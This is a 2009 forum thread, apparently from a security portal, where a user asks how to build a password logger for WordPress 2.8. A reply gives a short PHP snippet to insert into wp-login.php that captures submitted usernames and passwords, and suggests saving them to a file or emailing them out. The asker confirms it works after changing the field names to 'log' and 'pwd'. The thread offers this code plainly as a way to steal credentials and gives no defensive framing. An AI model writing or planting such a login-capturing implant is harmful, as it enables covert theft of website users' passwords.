|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 77
Members: 0
Total: 77
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
Wordpress Password logger |
|
Posted: Sat Jun 20, 2009 5:11 pm |
|
|
FlowerPower |
Beginner |
|
|
Joined: Jun 20, 2009 |
Posts: 2 |
|
|
|
|
|
|
|
Hello,
how can i make a simple password logger for wordpress 2.8 that just log's everything a user types into the username and password fields? |
|
|
|
|
Posted: Sat Jun 20, 2009 5:42 pm |
|
|
julioisaias |
Valuable expert |
|
|
Joined: Jan 25, 2008 |
Posts: 50 |
|
|
|
|
|
|
|
I don't understand.
I think you must insert a PHP code into login file. Is true? |
|
_________________ I study enough to make the rest a result. |
|
|
|
Posted: Sat Jun 20, 2009 5:50 pm |
|
|
earthquaker |
Advanced user |
|
|
Joined: Jun 02, 2008 |
Posts: 111 |
Location: q8 |
|
|
|
|
|
|
<?php
$login = $_POST['user_login'];
$pass = $_POST['user_pass'];
/*
add this code to wp-login.php although it needs a little more work but i did it fast, after that u can make a code to write them into a txt file or email them to u or whatever u wanted to do with it
$login <- holds the login
$pass <- holds the password
*/
?> |
|
|
|
|
Posted: Sat Jun 20, 2009 6:31 pm |
|
|
FlowerPower |
Beginner |
|
|
Joined: Jun 20, 2009 |
Posts: 2 |
|
|
|
|
|
|
|
Thanks it works, but i have to use $_POST['log']; and $_POST['pwd']; |
|
|
|
|
www.waraxe.us Forum Index -> All other software
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|